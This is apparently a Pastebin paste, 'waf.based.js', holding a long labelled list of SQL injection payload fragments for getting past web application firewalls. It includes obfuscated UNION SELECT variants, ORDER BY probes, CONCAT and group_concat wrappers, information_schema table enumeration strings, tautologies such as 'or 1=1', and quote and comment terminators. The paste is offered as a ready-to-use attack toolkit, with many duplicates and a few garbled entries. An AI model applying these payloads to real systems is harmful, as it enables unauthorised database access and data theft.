paperline27

waf.based.js

Apr 16th, 2024
77
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
JavaScript 13.42 KB | Cybersecurity | 0 0
  1.  
  2. // WAF BASED  / ORDERBY
  3.  
  4.  'ORDERBY1': txt = "/**/ORDER/**/BY/**/";
  5.  
  6.  
  7.  'ORDERBY2': txt = "/*!order*/+/*!by*/";
  8.  
  9.  
  10.  'ORDERBY3': txt = "/*!ORDER BY*/";
  11.  
  12.  
  13.  'ORDERBY4': txt = "/*!50000ORDER*//**//*!50000BY*/";
  14.  
  15.  
  16.  'ORDERBY5': txt = "/*!12345ORDER*/+/*!BY*/";
  17.  
  18.  
  19.  'ORDERBY6': txt = "/*!50000ORDER BY*/";
  20.  
  21.  
  22.  'ORDERBY7': txt = "/**/**/ORDER/**/BY/**/**/";
  23.  
  24.  'ORDERBY8': txt = "order/**_**/by";
  25.        
  26.  //WAF BASED/ UNION
  27.  
  28.  'UNION1': txt = "/*!50000%55nIoN*/ /*!50000%53eLeCt*/";
  29.  
  30.  
  31.  'UNION2': txt = "%55nion(%53elect 1,2,3)";
  32.  
  33.  
  34.  'UNION3': txt = "+union+distinct+select+";
  35.  
  36.  
  37.  'UNION4': txt = "+union+distinctROW+select+";
  38.  
  39.  
  40.  'UNION5': txt = "+ #?uNiOn + #?sEleCt";
  41.  
  42.  
  43.  'UNION6': txt = "+ #?1q %0AuNiOn all#qa%0A#%0AsEleCt";
  44.  
  45.  
  46.  'UNION7': txt = "/*!%55NiOn*/ /*!%53eLEct*/";
  47.  
  48.  
  49.  'UNION8': txt = "+un/**/ion+se/**/lect";
  50.  
  51.  
  52.  'UNION9': txt = "UNION/*&test=1*/SELECT/*&pwn=2*/";
  53.  
  54.  
  55.  'UNION10': txt = "+?UnI?On?+'SeL?ECT?";
  56.  
  57.  
  58.  'UNION11': txt = "+(UnIoN)+(SelECT)+";
  59.  
  60.  
  61.  'UNION12': txt = "+(UnI)(oN)+(SeL)(EcT)";
  62.  
  63.  
  64.  'UNION13': txt = "+UnIoN/*&a=*/SeLeCT/*&a=*/";
  65.  
  66.  
  67.  'UNION14': txt = "+uni>on+sel>ect+";
  68.  
  69.                    
  70.                    
  71.  'UNION15': txt = "%55nion(%53elect 1,2,3)-- -";
  72.  
  73.  'UNION16': txt = "/**//*!12345UNION SELECT*//**/";
  74.  
  75.  'UNION17': txt = "/**//*!50000UNION SELECT*//**/";
  76.  
  77.  'UNION18': txt = "/**/UNION/**//*!50000SELECT*//**/";
  78.    
  79.  'UNION19': txt = "/*!50000UniON SeLeCt*/";
  80.    
  81.  'UNION20': txt = "union /*!50000%53elect*/";
  82.  
  83.  
  84.  'UNION21': txt = "+ #?uNiOn + #?sEleCt";
  85.  
  86.  'UNION22': txt = "+ #?1q %0AuNiOn all#qa%0A#%0AsEleCt";
  87.  
  88.  'UNION23': txt = "/*!%55NiOn*/ /*!%53eLEct*/";
  89.    
  90.  'UNION24': txt = "/*!u%6eion*/ /*!se%6cect*/";
  91.    
  92.  'UNION25': txt = "+un/**/ion+se/**/lect";
  93.  
  94.  'UNION26': txt = "uni%0bon+se%0blect";
  95.  
  96.  'UNION27': txt = "%2f**%2funion%2f**%2fselect";
  97.  
  98.  'UNION28': txt = "union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A";
  99.    
  100.  'UNION29': txt = "REVERSE(noinu)+REVERSE(tceles)";
  101.    
  102.  'UNION30': txt = "/*--*/union/*--*/select/*--*/";
  103.  
  104.  'UNION31': txt = "union (/*!/**/ SeleCT */ 1,2,3)";
  105.  
  106.  'UNION32': txt = "/*!union*/+/*!select*/";
  107.  
  108.  'UNION33': txt = "union+/*!select*/";
  109.    
  110.  'UNION34': txt = "/**/union/**/select/**/";
  111.    
  112.  'UNION35': txt = "/**/uNIon/**/sEleCt/**/";
  113.  
  114.  'UNION36': txt = "+%2F**/+Union/*!select*/";
  115.  
  116.  'UNION37': txt = "/**//*!union*//**//*!select*//**/";
  117.  
  118.  'UNION38': txt = "/*!uNIOn*/ /*!SelECt*/";
  119.    
  120.  'UNION39': txt = "uNiOn aLl sElEcT";
  121.    
  122.  'UNION40': txt = "UNIunionON+SELselectECT";
  123.                    
  124.  'UNION41': txt = "/**/union/*!50000select*//**/";
  125.  
  126.  'UNION42': txt = "0%a0union%a0select%09";
  127.  
  128.  'UNION43': txt = "%0Aunion%0Aselect%0A";
  129.    
  130.  'UNION44': txt = "%55nion/**/%53elect";
  131.    
  132.  'UNION45': txt = 'uni<on all="" sel="">/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/';
  133.  
  134.  'UNION46': txt = "%252f%252a*/UNION%252f%252a /SELECT%252f%252a*/";
  135.  
  136.  'UNION47': txt = "%0A%09UNION%0CSELECT%10NULL%";
  137.  
  138.  'UNION48': txt = "/*!union*//*--*//*!all*//*--*//*!select*/";
  139.    
  140.  'UNION49': txt = "union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C";
  141.    
  142.  'UNION50': txt = "/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/";
  143.  
  144.  'UNION51': txt = "+UnIoN/*&a=*/SeLeCT/*&a=*/";
  145.  
  146.  'UNION52': txt = "union+sel%0bect";
  147.  
  148.  'UNION53': txt = "+uni*on+sel*ect+";
  149.    
  150.  'UNION54': txt = "+#1q%0Aunion all#qa%0A#%0Aselect";
  151.    
  152.  'UNION55': txt = "union(select (1),(2),(3),(4),(5))";
  153.  
  154.  'UNION56': txt = "UNION(SELECT(column)FROM(table))";
  155.  
  156.  'UNION57': txt = "%23xyz%0AUnIOn%23xyz%0ASeLecT+";
  157.  
  158.  'UNION58': txt = "%23xyz%0A%55nIOn%23xyz%0A%53eLecT+";
  159.    
  160.  'UNION59': txt = "union(select(1),2,3)";
  161.    
  162.  'UNION60': txt = "union (select 1111,2222,3333)";
  163.  
  164.  'UNION61': txt = "uNioN (/*!/**/ SeleCT */ 11)";
  165.  
  166.  'UNION62': txt = "union (select 1111,2222,3333)";
  167.  
  168.  'UNION63': txt = "+#1q%0AuNiOn all#qa%0A#%0AsEleCt";
  169.    
  170.  'UNION64': txt = "/**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//*T*/";
  171.    
  172.  'UNION65': txt = "%0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/";
  173.  
  174.  'UNION66': txt = "+%23sexsexsex%0AUnIOn%23sexsexs ex%0ASeLecT+";
  175.  
  176.  'UNION67': txt = "+union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C";
  177.  
  178.  'UNION68': txt = "/*!f****U%0d%0aunion*/+/*!f****U%0d%0aSelEct*/";
  179.    
  180.  'UNION69': txt = "+%23blobblobblob%0aUnIOn%23blobblobblob%0aSeLe cT+";
  181.    
  182.  'UNION70': txt = "/*!blobblobblob%0d%0aunion*/+/*!blobblobblob%0d%0aSelEct*/";
  183.  
  184.  'UNION71': txt = "/union\\sselect/g";
  185.  
  186.  'UNION72': txt = "/union\\s+select/i";
  187.  
  188.  'UNION73': txt = "/*!UnIoN*/SeLeCT";
  189.    
  190.  'UNION74': txt = "+UnIoN/*&a=*/SeLeCT/*&a=*/";
  191.    
  192.  'UNION75': txt = "+uni>on+sel>ect+";
  193.  
  194.  'UNION76': txt = "+(UnIoN)+(SelECT)+";
  195.  
  196.  'UNION77': txt = "+(UnI)(oN)+(SeL)(EcT)";
  197.  
  198.  'UNION78': txt = "+?UnI?On?+'SeL?ECT?";
  199.    
  200.  'UNION79': txt = "+uni on+sel ect+";
  201.    
  202.  'UNION80': txt = "+/*!UnIoN*/+/*!SeLeCt*/+";
  203.  
  204.  'UNION81': txt = "/*!u%6eion*/ /*!se%6cect*/";
  205.  
  206.  'UNION82': txt = "uni%20union%20/*!select*/%20";
  207.  
  208.  'UNION83': txt = "union%23aa%0Aselect";
  209.    
  210.  'UNION84': txt = "/**/union/*!50000select*/";
  211.    
  212.  'UNION85': txt = "/^****union.*$/ /^****select.*$/";
  213.  
  214.  'UNION86': txt = "/*union*/union/*select*/select+";
  215.  
  216.  'UNION87': txt = "/*uni X on*/union/*sel X ect*/";
  217.  
  218.  'UNION88': txt = "+un/**/ion+sel/**/ect+";
  219.    
  220.  'UNION89': txt = "+UnIOn%0d%0aSeleCt%0d%0a";
  221.    
  222.  'UNION90': txt = "UNION/*&test=1*/SELECT/*&pwn=2*/";
  223.  
  224.  'UNION91': txt = 'un?<ion sel="">+un/**/ion+se/**/lect+';
  225.  
  226.  'UNION92': txt = "+UNunionION+SEselectLECT+";
  227.  
  228.  'UNION93': txt = "+uni%0bon+se%0blect+";
  229.    
  230.  'UNION94': txt = "%252f%252a*/union%252f%252a /select%252f%252a*/";
  231.    
  232.  'UNION95': txt = "/%2A%2A/union/%2A%2A/select/%2A%2A/";
  233.  
  234.  'UNION96': txt = "%2f**%2funion%2f**%2fselect%2f**%2f";
  235.  
  236.  'UNION97': txt = "union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A";
  237.  
  238.  'UNION98': txt = "/*!UnIoN*/SeLecT+";
  239.    
  240.  'UNION99': txt = "/*!50000UnION*//*!50000SeLeCt*/";
  241.        
  242.  'UNION100': txt = "')AnD null UNiON SeLeCt 1,2,3,4,5;%00";
  243.    
  244.  'UNION101': txt = "')AnD null UNiON SeLeCt 1,2,3,4,5+--+";
  245.  
  246.  'UNION102': txt = "' And True Union Select 1,2,3;%00";
  247.  
  248.  'UNION103': txt = "' And False Union Select 1,2,3;%00";
  249.  
  250.  'UNION104': txt = "' And True Union Select 1,2,3+--+";
  251.  
  252.  'UNION105': txt = "' And False Union Select 1,2,3+--+";
  253.  
  254.  
  255. //WAF BASED/CONCAT
  256.  
  257.  'CONCAT1': txt = "CoNcAt()";
  258.  
  259.  
  260.  'CONCAT2': txt = "CON%08CAT()";
  261.  
  262.  
  263.  'CONCAT3': txt = "%0AcOnCat()";
  264.  
  265.  
  266.  'CONCAT4': txt = "/**//*!12345cOnCat*/";
  267.  
  268.  
  269.  'CONCAT5': txt = "/*!50000cOnCat*/(/*!*/)";
  270.  
  271.  
  272.  'CONCAT6': txt = "unhex(hex(concat(table_name)))";
  273.  
  274.  
  275.  'CONCAT7': txt = "unhex(hex(/*!12345concat*/(table_name)))";
  276.  
  277.  
  278.  'CONCAT8': txt = "unhex(hex(/*!50000concat*/(table_name)))";
  279.  
  280.  
  281. //Group Concat
  282.  
  283.  'group_concat 1': txt = '/*!group_concat*/()';
  284.  
  285.  
  286.  'group_concat 2': txt = 'gRoUp_cOnCAt()';
  287.  
  288.  
  289.  'group_concat 3': txt = 'group_concat(/*!*/)';
  290.  
  291.  
  292.  'group_concat 4': txt = 'group_concat(/*!12345table_name*/)';
  293.  
  294.  
  295.  'group_concat 5': txt = 'group_concat(/*!50000table_name*/)';
  296.  
  297.  
  298.  'group_concat 6': txt = '/*!group_concat*/(/*!12345table_name*/)';
  299.  
  300.  
  301.  'group_concat 7': txt = '/*!group_concat*/(/*!50000table_name*/)';
  302.  
  303.  
  304.  'group_concat 8': txt = '/*!12345group_concat*/(/*!12345table_name*/)';
  305.  
  306.  
  307.  'group_concat 9': txt = '/*!50000group_concat*/(/*!50000table_name*/)';
  308.  
  309.  
  310.  'group_concat 10': txt = '/*!GrOuP_ConCaT*/()';
  311.  
  312.  
  313.  'group_concat 11': txt = '/*!12345GroUP_ConCat*/()';
  314.  
  315.  
  316.  'group_concat 12': txt = '/*!50000gRouP_cOnCaT*/()';
  317.  
  318.  
  319.  'group_concat 13': txt = '/*!50000Gr%6fuP_c%6fnCAT*/()';
  320.  
  321.  
  322.  'group_concat 14': txt = 'unhex(hex(group_concat(table_name)))';
  323.  
  324.  
  325.  'group_concat 15': txt = 'unhex(hex(/*!group_concat*/(/*!table_name*/)))';
  326.  
  327.  
  328.  'group_concat 16': txt = 'unhex(hex(/*!12345group_concat*/(table_name)))';
  329.  
  330.  
  331.  'group_concat 17': txt = 'unhex(hex(/*!12345group_concat*/(/*!table_name*/)))';
  332.  
  333.  
  334.  'group_concat 18': txt = 'unhex(hex(/*!12345group_concat*/(/*!12345table_name*/)))';
  335.  
  336.  
  337.  'group_concat 19': txt = 'unhex(hex(/*!50000group_concat*/(table_name)))';
  338.  
  339.  
  340.  'group_concat 20': txt = 'unhex(hex(/*!50000group_concat*/(/*!table_name*/)))';
  341.  
  342.  
  343.  'group_concat 21': txt = 'unhex(hex(/*!50000group_concat*/(/*!50000table_name*/)))';
  344.  
  345.  
  346.  'group_concat 22': txt = 'convert(group_concat(table_name)+using+ascii)';
  347.  
  348.  
  349.  'group_concat 23': txt = 'convert(group_concat(/*!table_name*/)+using+ascii)';
  350.  
  351.  
  352.  'group_concat 24': txt = 'convert(group_concat(/*!12345table_name*/)+using+ascii)';
  353.  
  354.  
  355.  'group_concat 25': txt = 'convert(group_concat(/*!50000table_name*/)+using+ascii)';
  356.  
  357.  
  358.  'group_concat 26': txt = 'CONVERT(group_concat(table_name)+USING+latin1)';
  359.  
  360.  
  361.  'group_concat 27': txt = 'CONVERT(group_concat(table_name)+USING+latin2)';
  362.  
  363.  
  364.  'group_concat 28': txt = 'CONVERT(group_concat(table_name)+USING+latin3)';
  365.  
  366.  
  367.  'group_concat 29': txt = 'CONVERT(group_concat(table_name)+USING+latin4)';
  368.  
  369.  
  370.  'group_concat 30': txt = 'CONVERT(group_concat(table_name)+USING+latin5)';
  371.  
  372.  
  373. //WAF BASED/ NUMBER
  374.  
  375.  'NUMBER1': txt = "+div+0";
  376.  
  377.  
  378.  'NUMBER2': txt = "+div false+";
  379.  
  380.  
  381.  'NUMBER3': txt = "+Having+1=0+";
  382.  
  383.  
  384.  'NUMBER4': txt = "+Having false+";
  385.  
  386.  
  387.  'NUMBER5': txt = "+and false+";
  388.  
  389.  
  390.  'NUMBER6': txt = "+and null+";
  391.  
  392.  
  393.  'NUMBER7': txt = "+AND+1=0+";
  394.  
  395.  
  396.  'NUMBER8': txt = "+and+(1)=(0)+";
  397.  
  398.  
  399.  'NUMBER9': txt = "+and+(1)!=(0)+";
  400.  
  401.  
  402.  'NUMBER10': txt = "+and+2>3+";
  403.  
  404.  
  405.  'NUMBER11': txt = "%26%26 null";
  406.  
  407.  
  408.             //calculation statement
  409.  
  410.  'or 1': txt = "or 1=1";
  411.  
  412.  
  413.  'or 2': txt = "or 0=0";
  414.  
  415.  
  416.  'or 3': txt = "or 25-10-5=5";
  417.  
  418.  
  419.  'or 4': txt = "or 20-5-5=10";
  420.  
  421.  
  422.  'or 5': txt = "or 25-5-5=15";
  423.  
  424.  
  425.  'or 6': txt = "or 5*5*1=25";
  426.  
  427.  
  428.  'or 7': txt = "or 10+10+5=30";
  429.  
  430.  
  431.  'or 8': txt = "Or 1 Less Than 0";
  432.  
  433.  
  434.             //MOD WAF
  435.  'mod 1': txt = "and point(29,9)";
  436.    
  437.  
  438.  'mod 2': txt = "and mod(9,4)";
  439.    
  440.  
  441.  'mod 3': txt = "and power(5,5)";
  442.    
  443.  
  444.  'mod 4': txt = "and Radians(point(53,12))";
  445.    
  446.  
  447.  'mod 5': txt = "and polygon(point(53,12))";
  448.    
  449.  
  450.  'mod 6': txt = "Multipolygon(point(53,12))";
  451.    
  452.  
  453.  'mod 7': txt = "Linestring(point(53,12))";
  454.    
  455.  
  456.  'mod 8': txt = "Multilinestring(point(53,12))";
  457.    
  458.  
  459.  'mod 9': txt = "Geometrycollection(point(53,12))";
  460.    
  461.  
  462. //WAF BASED/ SCHEMA
  463.  
  464.  
  465.  'SCHEMA1': txt = "/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=schEMA()-- -";
  466.  
  467.  
  468.  'SCHEMA2': txt = "/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like schEMA()-- -";
  469.  
  470.  
  471.  'SCHEMA3': txt = "/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=database()-- -";
  472.  
  473.  
  474.  'SCHEMA4': txt = "/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like database()-- -";
  475.  
  476.  
  477.  'SCHEMA5': txt = "/*!FrOm*/+%69nformation_schema./**/columns+/*!50000Where*/+/*!%54able_name*/=hex table/*!FrOm*/+information_schema./**/columns+/*!12345Where*/+/*!%54able_name*/ like hex table";
  478.  
  479.  
  480.  'SCHEMA6': txt = "/*!50000frOm*/+/*!50000information_schema*/%252e/**/columns";
  481.                
  482.  
  483. //WAF BASED/ FIX POINT
  484.  
  485.  'FIX POINT1': txt = "--";
  486.  
  487.  'FIX POINT2': txt = "-- -";
  488.  
  489.  'FIX POINT3': txt = "--+-";
  490.  
  491.  'FIX POINT4': txt = ")--";
  492.  
  493.  'FIX POINT5': txt = ")-- -";
  494.  
  495.  'FIX POINT6': txt = ")--+-";
  496.  
  497.  'FIX POINT7': txt = "))--";
  498.  
  499.  'FIX POINT8': txt = "))-- -";
  500.  
  501.  'FIX POINT9': txt = "))--+-";
  502.  
  503.  'FIX POINT10': txt = ";%00";
  504.  
  505.  'FIX POINT11': txt = ") ;%00";
  506.  
  507.  'FIX POINT12': txt = "));%00";
  508.  
  509.  'FIX POINT13': txt = "%23";
  510.  
  511.  'FIX POINT14': txt = "%60";
  512.  
  513.  'FIX POINT15': txt = "%90";
  514.  
  515.  'FIX POINT16': txt = "and 1=1";
  516.  
  517.  'FIX POINT17': txt = "and '1'='1";
  518.  
  519.  'FIX POINT18': txt = "and (1)=(1 ";
  520.  
  521.  'FIX POINT19': txt = "php?id=(1) -- -";
  522.  
  523.  'FIX POINT20': txt = "'--+-";
  524.  
  525.  'FIX POINT21': txt = "')-- -";
  526.  
  527.  'FIX POINT22': txt = "')--+-";
  528.  
  529.  'FIX POINT23': txt = "'))-- -";
  530.  
  531.  'FIX POINT24': txt = "'))--+-";
  532.  
  533.  'FIX POINT25': txt = "';%00";
  534.  
  535.  'FIX POINT26': txt = "');%00";
  536.  
  537.  'FIX POINT27': txt = "'));%00";
  538.  
  539.  'FIX POINT28': txt = "'%23";
  540.  
  541.  'FIX POINT29': txt = "'%60";
  542.  
  543.  'FIX POINT30': txt = "'%90";
  544.  
  545.  'FIX POINT31': txt = "' and 1=1";
  546.  
  547.  'FIX POINT32': txt = "' and '1'='1";
  548.  
  549.  'FIX POINT33': txt = "' and (1)=(1 ";
  550.  
  551.  'FIX POINT34': txt = "php?id=(1') -- -";
  552.  
  553.  'FIX POINT35': txt = "\"-- -";
  554.  
  555.  'FIX POINT36': txt = "\"--+-";
  556.  
  557.  'FIX POINT37': txt = "\"%23";
  558.  
  559.  'FIX POINT38': txt = "\")-- -";
  560.  
  561.  'FIX POINT39': txt = "\")--+-";
  562.  
  563.  'FIX POINT40': txt = "\"))--+-";
  564.  
  565.  'FIX POINT41': txt = "\";%00";
  566.  
  567.  'FIX POINT42': txt = "\") ;%00";
  568.  
  569.  'FIX POINT43': txt = "\"));%00";
  570.  
  571.  'FIX POINT44': txt = "\"%60";
  572.  
  573.  'FIX POINT45': txt = "\"%90";
  574.  
  575.  'FIX POINT46': txt = "\" and 1=1";
  576.  
  577.  'FIX POINT47': txt = "\" and '1'='1";
  578.  
  579.  'FIX POINT48': txt = "\" and (1)=(1 ";
  580.  
  581.  'FIX POINT49': txt = "php?id=(1\") -- -";
  582.  
  583.                
  584.             //FIX TAB 2
  585.             //case 'FIX POINT50': txt = "and x(point(0,0)) -- -";
  586.             //  break;
  587.  'FIX POINT50': txt = "/*";
  588.  
  589.  'FIX POINT51': txt = "--/*";
  590.  
  591.  'FIX POINT52': txt = "\\--+";
  592.  
  593.  'FIX POINT53': txt = "\\-- +";
  594.  
  595.  'FIX POINT54': txt = "#--+";
  596.  
  597.  'FIX POINT55': txt = "#-- -";
  598.    
  599.  'FIX POINT56': txt = "--++";
  600.  
  601.  'FIX POINT57': txt = "+--+";
  602.    
  603.  'FIX POINT58': txt = "'))%23";
  604.  
  605.  'FIX POINT59': txt = "a'))%60";
  606.  
  607.  'FIX POINT60': txt = "'));%00";
  608.  
  609.  'FIX POINT61': txt = "');%00";
  610.    
  611.  'FIX POINT62': txt = "')order by 10;%00";
  612.  
  613.                    
  614.             //FIX TAB 3
  615.  'FIX POINT63': txt = "AND'1";
  616.  
  617.  'FIX POINT64': txt = "or'1";
  618.  
  619.  'FIX POINT65': txt = "AND1='1";
  620.  
  621.  'FIX POINT66': txt = "and 1=0";
  622.  
  623.  'FIX POINT67': txt = "') and true";
  624.  
  625.  'FIX POINT68': txt = "') and false";
  626.    
  627.  'FIX POINT69': txt = "') or true";
  628.    
  629.  'FIX POINT70': txt = "') or false";
  630.  
  631.  'FIX POINT71': txt = "' and true";
  632.  
  633.  'FIX POINT72': txt = "' and false";
  634.  
  635.  'FIX POINT73': txt = "' or true";
  636.    
  637.  'FIX POINT74': txt = "' or false";
  638.  
  639.  'FIX POINT75': txt = "and x(point(0,0)) -- -";
  640.  
  641.  
Add Comment
Please, Sign In to add comment